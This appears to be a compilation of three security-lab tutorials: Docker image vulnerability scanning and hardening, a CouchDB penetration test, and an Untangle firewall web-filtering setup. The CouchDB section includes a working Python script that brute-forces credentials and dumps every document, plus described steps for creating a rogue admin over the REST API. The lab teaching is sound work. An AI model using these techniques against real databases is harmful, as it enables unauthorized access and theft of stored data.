Docker for Pentester: Image Vulnerability Assessment

We are moving from virtualization to containerization, and container registries such as Docker Hub and Quay.io are familiar to everyone. You can pick a Docker image for a particular application from several choices. As you know, when a developer builds a container it does not only package the program; it also ships a slice of the operating system (the base image and its libraries), and we do not know whether those bundled libraries have been patched or are still vulnerable.

So, in this post we will show how to perform a container audit and vulnerability assessment in any infrastructure.

Table of Contents

Prerequisites

Clair

  • Installation
  • Docker Image Vulnerability Scanning

Bench-security

  • Installation
  • Container Hardening

Prerequisites

On your host machine, install Docker and pull the image you want to scan.

Clair: Vulnerability Scanning

Installation

CoreOS created an excellent container scanning tool called Clair. Clair is an open-source project for the static analysis of vulnerabilities in application containers and Docker images: it indexes the packages found in each image layer and matches them against vulnerability data imported from the distributions' security trackers. The client used below, clair-scanner (github.com/arminc/clair-scanner), is a separate project that drives a Clair server from the command line; clone it with git using the following command.

The scanner is written in Go, so Go (golang) must be installed on the local machine on which Docker is running.

Build the project so that all of its dependencies are pulled in.

As you can see, the directory listing now contains the following files.

If you do not have a Docker image on your host machine, pull a new one, as we did here, to illustrate the vulnerability assessment.

Now run the Clair database container (a PostgreSQL image pre-loaded with vulnerability data), which listens on local port 5432.

Then run the Clair container itself, linked to that PostgreSQL database, with the following command. Clair's API listens on port 6060; that is the port clair-scanner talks to.

Now let's use clair-scanner to scan a container image for vulnerabilities with the following command. The --ip value is the address of the host as seen from inside the Clair container: clair-scanner starts a small local web server that serves the image layers to Clair, so it must be an address Clair can reach, not 127.0.0.1.

Syntax: ./clair-scanner --ip <docker host ip> -r report.json <docker-image>

Boom! The scan output reports 50 unapproved vulnerabilities. "Unapproved" means not listed in a whitelist (passed with -w): clair-scanner exits with a non-zero status when any unapproved finding remains, which is what lets it act as a gate in a CI pipeline, and the JSON report written with -r holds the per-package detail (package, version, vulnerability ID, severity and the fixed version, if any).
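As an added example (not code from the original post or from the Clair and clair-scanner projects), here is a small Python gate that reads the JSON report clair-scanner writes with -r and decides whether a build should fail. It assumes the report layout clair-scanner produces (top-level image, unapproved and vulnerabilities keys, each finding carrying featurename, featureversion, vulnerability, namespace, severity and fixedby); the embedded sample report is constructed, and its CVE-0000-000x identifiers are placeholders, not real advisories.

```python
"""Gate a build on a clair-scanner JSON report (added example, not clair-scanner code).

Assumed report layout (as written by clair-scanner -r): {"image": ..., "unapproved": [ids],
"vulnerabilities": [{featurename, featureversion, vulnerability, namespace, severity, fixedby}]}.
"""
import json
import sys

# Clair's severity scale, lowest to highest.
SEVERITY_RANK = {"Unknown": 0, "Negligible": 1, "Low": 2, "Medium": 3,
                 "High": 4, "Critical": 5, "Defcon1": 6}

# Constructed sample report; the identifiers are placeholders, not real CVEs.
SAMPLE_REPORT = json.dumps({
    "image": "example/app:1.0",
    "unapproved": ["CVE-0000-0001", "CVE-0000-0002", "CVE-0000-0003"],
    "vulnerabilities": [
        {"featurename": "libfoo", "featureversion": "1.0-1", "vulnerability": "CVE-0000-0001",
         "namespace": "debian:10", "severity": "High", "fixedby": "1.0-2"},
        {"featurename": "libbar", "featureversion": "2.3", "vulnerability": "CVE-0000-0002",
         "namespace": "debian:10", "severity": "Medium", "fixedby": ""},
        {"featurename": "libbaz", "featureversion": "0.9", "vulnerability": "CVE-0000-0003",
         "namespace": "debian:10", "severity": "Low", "fixedby": "0.9-1"},
    ],
})


def load_report(text):
    """Parse the report and refuse anything that lacks the expected keys."""
    report = json.loads(text)
    for key in ("image", "unapproved", "vulnerabilities"):
        if key not in report:
            raise ValueError(f"report missing key: {key}")
    return report


def gate(report, min_severity="High", whitelist=(), require_fix=True):
    """Split findings into (blocking, waived).

    A finding blocks when it is unapproved, at or above min_severity and not whitelisted.
    With require_fix=True, findings that have no fixed version are waived instead of
    blocking: they stay visible, but a base image with unfixed packages does not fail
    every build.
    """
    threshold = SEVERITY_RANK[min_severity]
    unapproved = set(report["unapproved"])
    blocking, waived = [], []
    for v in report["vulnerabilities"]:
        vid = v["vulnerability"]
        if vid not in unapproved or vid in whitelist:
            continue
        if SEVERITY_RANK.get(v.get("severity", "Unknown"), 0) < threshold:
            continue
        if require_fix and not v.get("fixedby"):
            waived.append(v)
        else:
            blocking.append(v)
    return blocking, waived


def summarize(report, **kw):
    """Human-readable summary plus a boolean: True when the image may ship."""
    blocking, waived = gate(report, **kw)
    lines = [f"image: {report['image']}"]
    for v in blocking:
        lines.append(f"BLOCK {v['vulnerability']} {v['featurename']} {v['featureversion']} "
                     f"({v['severity']}) fixed in {v['fixedby']}")
    for v in waived:
        lines.append(f"WAIVE {v['vulnerability']} {v['featurename']} {v['featureversion']} "
                     f"({v['severity']}) no fix available")
    return "\n".join(lines), len(blocking) == 0


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_REPORT
    out, ok = summarize(load_report(text), min_severity="Medium")
    print(out)
    sys.exit(0 if ok else 1)
```

Run it as python clair_gate.py report.json in the pipeline step after clair-scanner; the exit status is 1 while a blocking finding remains. Findings without a fixed version are listed as WAIVE so they remain visible without failing every build, which is the usual compromise when a base image ships distribution packages that have no fix yet; switch to require_fix=False once the team is ready to act on those too.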

Bench-Security: Container Hardening

Docker Bench for Security is a script that checks for dozens of common best practices around deploying Docker containers in production. The tests are fully automated and are based on the CIS Docker Benchmark v1.2.0.

As you can see, we have a few Docker images on our host.

Let's start the Docker audit for container hardening: clone the docker-bench-security repository and run the script as root (sudo sh docker-bench-security.sh), as shown here. It has to run on the Docker host itself, because it inspects the daemon configuration and the running containers.

Each check is reported as INFO, WARN, PASS or NOTE under one of the following configuration sections:

  1. Host Configuration
  2. Docker Daemon Configuration
  3. Docker Daemon Configuration Files
  4. Container Images and Build Files
  5. Container Runtime
  6. Docker Security Operations

Let me explain this in a better way: in the highlighted section you can see that the bench raised a warning because the container is running as root, i.e. no dedicated low-privilege user was created for it.

To fix this kind of misconfiguration, stop the running container and start it again as a low-privilege user, either with the --user flag of docker run (for example docker run --user 1000:1000 ...) or by adding a USER instruction to the image's Dockerfile, as shown below.

Once the gap is closed, run the bench again for cross-validation and confirm that the earlier warning has turned into a pass. As you can see, this time we got the green PASS for that check, which shows the loophole has been closed.
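The cross-validation step above is easier when you keep the transcript of each run and compare them. The following Python script is an added example (not part of the original post or of Docker Bench for Security): it parses the script's [LEVEL] <id> - <title> lines, attaches the indented * detail lines to the check they belong to, and reports which WARN findings were fixed, which persist and which are new between two runs. The two transcripts embedded in it are constructed, trimmed samples in that format.

```python
"""Diff two docker-bench-security runs (added example, not part of docker-bench-security).

Assumed transcript format: "[INFO|WARN|PASS|NOTE] <id> - <title>" per check, followed by
indented "* detail" lines that belong to the check just above.
"""
import re
import sys

LINE = re.compile(r"^\[(INFO|WARN|PASS|NOTE)\]\s+(?:(\d+(?:\.\d+)?)\s+-\s+)?(.*)$")

# Constructed, trimmed samples: before and after re-running the container as non-root.
BEFORE = """\
[INFO] 4 - Container Images and Build Files
[WARN] 4.1 - Ensure that a user for the container has been created
[WARN]      * Running as root: web
[PASS] 4.2 - Ensure that containers use only trusted base images
[INFO] 5 - Container Runtime
[WARN] 5.25 - Ensure that the container is restricted from acquiring additional privileges
[WARN]      * Privileges not restricted: web
"""
AFTER = """\
[INFO] 4 - Container Images and Build Files
[PASS] 4.1 - Ensure that a user for the container has been created
[PASS] 4.2 - Ensure that containers use only trusted base images
[INFO] 5 - Container Runtime
[WARN] 5.25 - Ensure that the container is restricted from acquiring additional privileges
[WARN]      * Privileges not restricted: web
"""


def parse(transcript):
    """Map check id -> {"level", "title", "details"}; detail lines attach to the
    most recent numbered check."""
    checks, current = {}, None
    for raw in transcript.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        level, check_id, text = m.groups()
        if check_id:
            current = check_id
            checks[current] = {"level": level, "title": text, "details": []}
        elif current and text.startswith("*"):
            checks[current]["details"].append(text.lstrip("* ").strip())
    return checks


def warnings(checks):
    """Ids of every check reported as WARN."""
    return {cid for cid, c in checks.items() if c["level"] == "WARN"}


def _key(cid):
    # Sort "4.10" after "4.2" numerically instead of lexically.
    return tuple(int(p) for p in cid.split("."))


def compare(before_text, after_text):
    """Which WARN findings disappeared, stayed, or appeared between two runs."""
    wb, wa = warnings(parse(before_text)), warnings(parse(after_text))
    return {"fixed": sorted(wb - wa, key=_key),
            "persisting": sorted(wb & wa, key=_key),
            "new": sorted(wa - wb, key=_key)}


if __name__ == "__main__":
    if len(sys.argv) == 3:                 # python bench_diff.py before.log after.log
        before, after = open(sys.argv[1]).read(), open(sys.argv[2]).read()
    else:
        before, after = BEFORE, AFTER
    result = compare(before, after)
    titles = parse(after)
    for bucket, ids in result.items():
        print(bucket + ":")
        for cid in ids:
            print(f"  {cid} {titles.get(cid, {}).get('title', '')}")
```

Capture each run with sudo sh docker-bench-security.sh | tee run-N.log and feed two logs to the script; a persisting or new WARN after a "fix" is the signal that the change did not take effect (for example, a container restarted with its old options).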

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

Penetration Testing on CouchDB (5984)

What is CouchDB

CouchDB is a free and open-source, fault-tolerant NoSQL document database developed by the Apache Software Foundation. It stores data as JSON documents, uses JavaScript for its views (map/reduce functions) and exposes a RESTful API to transfer data over HTTP.

CouchDB Features

  • CouchDB has a REST API based on HTTP, which makes it easy to talk to the database from any client.
  • It stores data in a semi-structured format: each document carries its own implicit structure, so records of different shapes can live in the same database.
  • CouchDB users get powerful data mapping (views) that allow querying, combining and filtering of the stored information.

In this post, we will demonstrate how to set up our own vulnerable CouchDB instance for penetration testing on Ubuntu 20.04.1 and how to conduct CouchDB penetration testing.

Table of Contents

  • Prerequisites
  • CouchDB setup on Ubuntu 20.04.1
  • CouchDB penetration testing
  • Scanning: Nmap
  • Enumeration
  • Exploiting: Metasploit

Prerequisites

To configure CouchDB on your Ubuntu platform, the following are required for the installation. (Apache is installed first in this walkthrough, but CouchDB serves its own HTTP API on port 5984 and does not depend on it.)

  • Ubuntu 20.04.1 with a minimum of 4 GB RAM and 2 CPUs
  • Root privileges
  • Apache server
  • Attacker machine: Kali Linux

CouchDB Setup on Ubuntu 20.04

Let's start by installing the Apache server first.

Apache is a free, open-source HTTP web server available for Linux; install it from the terminal by running the following command.

To install CouchDB we first need to enable the CouchDB repository. Start by importing the CouchDB GPG signing key into the system with the following command, so that apt can verify the packages it downloads.

After adding the key, add the CouchDB repository entry with the following command.

Now that the repository is enabled, update the package index and install CouchDB directly with the following command.

A prompt will appear on the screen; select the standalone option (or clustered, as per your requirements).

Next, you will be asked for the IP address of the network interface CouchDB should bind to. Enter the IP of your server machine (or 0.0.0.0 to listen on all interfaces); binding to 127.0.0.1 would keep the service reachable only locally and invisible to the attacker machine.

On the next prompt, after entering the IP of the server machine, create a password for the CouchDB admin user, confirm it, and the installation will continue.

Now start and enable the CouchDB service on Ubuntu and check its status with the following commands.

Congratulations! You have successfully installed CouchDB on your Ubuntu platform. You can now reach CouchDB from your favourite browser through its web console, Fauxton, at the following URL (port 5984, path /_utils).

Use your credentials to login to the CouchDB database.

Now create a new admin for the server

After creating the admin now create a new database for the server

The database is created successfully

Let's add some data to the database we have created. You can do it directly from the GUI, but I am comfortable with the command line, so follow the commands below.

Hurray! The documents have been inserted successfully.

Let’s start Pentesting CouchDB

In this section, you will be learning how to compromise the Database using different techniques.

Let's fire up the attacking machine, Kali Linux.

Nmap

By default, the CouchDB service runs on port 5984. With the help of Nmap, let's identify the state of that port (a service/version scan, -sV, also identifies the CouchDB version from its HTTP banner).

As you can see, port 5984 is open for CouchDB.

Enumeration

Nmap also has the capability to perform automatic enumeration through its NSE scripts. To perform this, follow the commands below (the couchdb-databases and couchdb-stats scripts query the server's HTTP API).

As you can see, it provides quite enough information about the database to help with brute-forcing or dumping the credentials.

Exploiting: Metasploit

Module: auxiliary/scanner/couchdb/couchdb_login

Let's brute-force the target. To perform this attack, fire up msfconsole, load the following module, set RHOSTS and the user and password lists, and run it.

Great! Now you have the login credentials of the database.

Using those credentials, we can use curl to list and download every database created on the server (GET /_all_dbs, then GET /<db>/_all_docs?include_docs=true for each database).

We can also create our own admin user on the server using curl, by writing to the server's admin configuration over its REST API.

You can also verify that the user was created using curl.

Now you have admin access to the whole database server. To perform further attacks, you can use the other CouchDB modules listed in the MSF console.
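The brute-force and curl steps above, carried out programmatically as an added example (not the original post's code, nor Metasploit's couchdb_login module): fingerprint the server from GET /, check whether /_all_dbs is readable without credentials, spray a short credential list over HTTP Basic auth, and pull every document of a database through _all_docs?include_docs=true. So that it runs offline, the FakeCouch class is a constructed stand-in that imitates CouchDB 3.x responses (the admin/secret credentials and the ignite database are assumptions); point target at http://<ip>:5984 to use the assessment functions against a real instance.

```python
"""Enumerate a CouchDB server over its HTTP API (added example, not Metasploit code).

FakeCouch is a constructed stand-in that mimics CouchDB 3.x JSON responses so the script
runs offline; the assessment functions below it only use real CouchDB endpoints
(GET /, GET /_all_dbs, GET /{db}/_all_docs?include_docs=true).
"""
import base64
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

FAKE_ADMIN = ("admin", "secret")                 # assumed lab credentials
FAKE_DBS = ["_replicator", "_users", "ignite"]   # assumed database names
FAKE_DOCS = {"ignite": [{"_id": "u1", "_rev": "1-a", "user": "raj"}]}


class FakeCouch(BaseHTTPRequestHandler):
    """Minimal CouchDB look-alike: open welcome banner, everything else admin-only,
    which is how CouchDB 3.x behaves once an admin has been set."""

    def _authed(self):
        hdr = self.headers.get("Authorization", "")
        if not hdr.startswith("Basic "):
            return False
        user, _, pw = base64.b64decode(hdr[6:]).decode().partition(":")
        return (user, pw) == FAKE_ADMIN

    def _send(self, code, body):
        data = json.dumps(body).encode()
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        if self.path == "/":
            return self._send(200, {"couchdb": "Welcome", "version": "3.1.1"})
        if not self._authed():
            return self._send(401, {"error": "unauthorized",
                                    "reason": "You are not a server admin."})
        if self.path == "/_all_dbs":
            return self._send(200, FAKE_DBS)
        db = self.path.split("/")[1]
        if self.path.endswith("/_all_docs?include_docs=true") and db in FAKE_DOCS:
            rows = [{"id": d["_id"], "key": d["_id"], "value": {"rev": d["_rev"]},
                     "doc": d} for d in FAKE_DOCS[db]]
            return self._send(200, {"total_rows": len(rows), "offset": 0, "rows": rows})
        self._send(404, {"error": "not_found", "reason": "missing"})

    def log_message(self, *args):    # keep the demo quiet
        pass


def start_fake_server():
    srv = HTTPServer(("127.0.0.1", 0), FakeCouch)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_port}"


def get_json(base, path, creds=None):
    """GET base+path, optionally with HTTP Basic auth; return (status, parsed JSON)."""
    req = urllib.request.Request(base + path)
    if creds:
        token = base64.b64encode(f"{creds[0]}:{creds[1]}".encode()).decode()
        req.add_header("Authorization", "Basic " + token)
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, json.load(resp)
    except urllib.error.HTTPError as err:
        return err.code, json.load(err)


def fingerprint(base):
    """Version string from the welcome banner, or None if this is not CouchDB."""
    status, body = get_json(base, "/")
    return body.get("version") if status == 200 and body.get("couchdb") == "Welcome" else None


def anonymous_listing(base):
    """True when /_all_dbs is readable without credentials (an 'admin party' setup)."""
    return get_json(base, "/_all_dbs")[0] == 200


def spray(base, candidates):
    """First (user, password) pair accepted for /_all_dbs, else None."""
    for creds in candidates:
        if get_json(base, "/_all_dbs", creds)[0] == 200:
            return creds
    return None


def dump_db(base, db, creds):
    """All documents of one database, or [] when it is missing or unreadable."""
    status, body = get_json(base, f"/{db}/_all_docs?include_docs=true", creds)
    return [row["doc"] for row in body["rows"]] if status == 200 else []


if __name__ == "__main__":
    target = start_fake_server()   # replace with "http://<ip>:5984" for a real host
    print("version:", fingerprint(target))
    print("anonymous /_all_dbs:", anonymous_listing(target))
    found = spray(target, [("admin", "admin"), ("admin", "password"), ("admin", "secret")])
    print("working credentials:", found)
    if found:
        for db in get_json(target, "/_all_dbs", found)[1]:
            print(db, dump_db(target, db, found))
```

Keep the candidate list short and the timeout tight when spraying a real target: CouchDB answers every failed Basic-auth attempt with a 401, so a long list is cheap for the attacker but very visible in the server log, which is exactly what the defender should be alerting on.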

In this way, we can test for CouchDB loopholes and submit the findings to the network admin.

Author: Paras Khorwal is a Certified Ethical Hacker, Technical Writer and Penetration Tester at Hacking Articles. Technology and gadget freak. Contact here

Firewall Lab Setup: Untangle

What is a firewall? A firewall is a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules. A firewall typically establishes a barrier between a trusted internal network and an untrusted external network, such as the Internet. (Wikipedia)

Firewalls are also categorized as network firewalls and host-based firewalls. Network firewalls run on network hardware and filter traffic between two or more networks; host-based firewalls run on the host itself and control the traffic in and out of that device.

Here are the major types of firewalls.

  • First-generation: Packet-filtering firewalls
  • Circuit-level gateways
  • Stateful packet inspection
  • Application-level gateway

Table of Contents

  • Downloading untangle-15.1.0-amd64.ova
  • Introduction to Untangle NG Firewall
  • Creating a Virtual Machine with VMware Workstation
  • Configuration of Untangle
  • Configuration of Untangle Apps Part I: Web Filtering & SSL Inspector

Introduction to Untangle NG Firewall

Untangle is NGFW/UTM software that brings together everything your network needs to stay healthy on one box: web content and spam filtering, virus scanning, VPN connectivity, multi-WAN failover and much more. Its web-based interface for tracking and filtering network traffic makes deployment and management simple.

Requirement: Minimum 2GB RAM, Dual-Core processor, 8 GB hard drive space and minimum 2 LAN cards are required.

Creating a Virtual Machine with VMware Workstation

Once the untangle.ova file is downloaded, double-click it to import it into VMware Workstation; the setup will start.

The Setup Wizard will open automatically when Untangle first boots.

Language selection

Before you begin the setup wizard, select your preferred language.

The next screen simply welcomes you to the Setup Wizard; click Next to continue. On the Untangle Software License screen, click Agree.

Configure the Server: in this first step, set a password for the administrator account and select a time zone. An admin e-mail address can also be entered to receive alerts and reports. The installation method is optional.

Now click on Network Cards.

Identify Network Cards: if this is an Untangle appliance, you can simply click Next.

Note: if this is a custom server, make sure the physical network cards are mapped to the right (intended) interfaces.

Configures Interface

The default selection is Auto (DHCP). If an address was acquired successfully, the automatically assigned address is displayed; otherwise, click Renew DHCP to acquire an IP address. Click Test Connectivity to verify Internet access.

Configure your Internal network interface

Configure your "Internal" interface (and its DHCP server and NAT configuration). There are two choices: NAT (router mode) or Bridge.

In router mode Untangle is the edge device on your network and acts as both firewall and router. In this case, you need to configure your external and internal interfaces correctly for traffic to flow.

We configure the internal interface with DHCP and NAT (Network Address Translation) enabled, so that the internal machines with private addresses share one public IP. This is generally called router mode.

In my testing lab I am not enabling DHCP

Automatic Upgrades configuration

If Automatic Upgrades is enabled, NG Firewall automatically checks for new versions and performs the upgrade.

In my testing lab I am not enabling “Connect to Command Center”

Setup Wizard: Finished. That's it!

Click on Go to Dashboard

Configuration of Untangle

In part one we are going to learn how to configure web filtering

Congratulations! Untangle is ready to be configured. Click on Continue.

The next steps include registration.

After finishing registration click on continue

Next, install the desired apps and, if needed, tune the configuration of Untangle NG Firewall. In my testing lab, I am going with Install the recommended Apps.

The recommended apps are now installed, as you can see on the screen, and you can install other available apps as per your requirements. The Apps tab shows the currently installed apps.

Let's come to the Dashboard of Untangle, where you can see almost all the information on one page.

To identify the configuration of the Untangle network cards, navigate to the Config tab.

The config tab holds all the settings related to configuration of the Untangle server itself and settings for components of the platform that apps may interact with.

Configuration of Untangle APPS Part I: Web Filtering

Let's use a Windows 10 system as the Untangle client.

This client is an internal system, and we set its default gateway to 192.168.2.1, the IP of the Untangle firewall's internal interface.

Now you can see that the Internet is working and the social networking site facebook.com opens.

Block Categories

Now come back to the Untangle dashboard and go to Apps > Web Filter > Categories tab > Social Networking.

Categories tab: categories let you change which website categories are blocked or flagged. Blocked categories show the user a block page; flagged categories let the user reach the site, but the visit is silently recorded as a violation in the event logs and reports. The block and flag actions work the same way for all Web Filter options.

For our testing lab, we are going to block Social Networking sites. Click on Save.

Now you can see that on the client system the social networking site www.facebook.com is blocked and does not open.

Lookup Site Tab

Now again go to the Untangle dashboard: Apps > Web Filter > Site Lookup.

Site Lookup lets you find out which category a URL belongs to. Clicking on it opens a dialogue: enter the URL to be categorized in the Web URL field and click Search.

Here we are looking up the site www.hackingarticles.in; click on Search and see the result.

Block Sites Tab

Now again go to the Untangle dashboard: Apps > Web Filter > Block Sites.

Under Block Sites, you can add individual domain names you want blocked or flagged: just enter the domain name (e.g. youtube.com) and specify the action you want.

We are going to block the site www.ignitetechnologies.in.

Click on Add, type the site you want to block, then click on Done.

And then click on save.

Let's check on the client system.

Type the site www.ignitetechnologies.in and, bingo, the site is now blocked.

Pass Sites Tab

Now again go to the Untangle dashboard: Apps > Web Filter > Pass Sites.

Pass Sites is used to allow content that would otherwise have been blocked. This is useful for "unblocking" pages that a category or Block Sites rule would otherwise catch.

Domains you add to the Pass Sites list will be permitted even if they are blocked by a category or by an individual URL entry: just add the domain and save. When the pass option is unchecked, the entry is inactive and the site can be blocked as though it were not listed.

I am going to pass www.linkedin.com/ site as an example.

Click on Add, type the required site and click Done.

Then click on save.

Now on the client system, open a browser and type www.linkedin.com/ in the URL bar; as you can see, the site opens.

Pass Clients Tab

Let's add another client, with IP 192.168.2.11 and default gateway 192.168.2.1 (the Untangle IP).

On this system, try to open www.linkedin.com and see the result: this site falls under the Web Filter block category.

Now again go to the Untangle dashboard: Apps > Web Filter > Pass Clients.

Pass Clients tab: if you add an IP address to this list, Web Filter will not block any traffic from that IP, regardless of the blocked categories or sites.

Just add the IP 192.168.2.11, enable the pass option, then save the configuration as shown in the image.

Now on the client system, open a browser and type www.linkedin.com; bingo, the site works on this system thanks to the Pass Clients setting.

About SSL Inspector

The SSL Inspector is a special application that lets the other Untangle apps that process HTTP traffic also process encrypted HTTPS, and lets the SMTP processing apps handle SMTP over SSL/TLS as well. It does this by terminating the TLS session on the Untangle server, decrypting the traffic so that the relevant apps and services can inspect it, and re-encrypting it towards the client with a certificate signed by Untangle's own CA. Clients therefore only accept the inspected connections once that Untangle root certificate has been installed in their trust store; until then, browsers reject the re-signed certificates.

Navigate to Apps > SSL Inspector and turn the SSL Inspector on for HTTPS sites.

Now let's check on the client side: open a browser and type any site name in the URL bar.

As you can see, after the SSL Inspector is enabled, all HTTPS sites are blocked on the client.

How to make these sites work on the client system with the SSL Inspector enabled is covered in Configuration of Untangle Apps Part II.

Author: Rajesh Bora is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here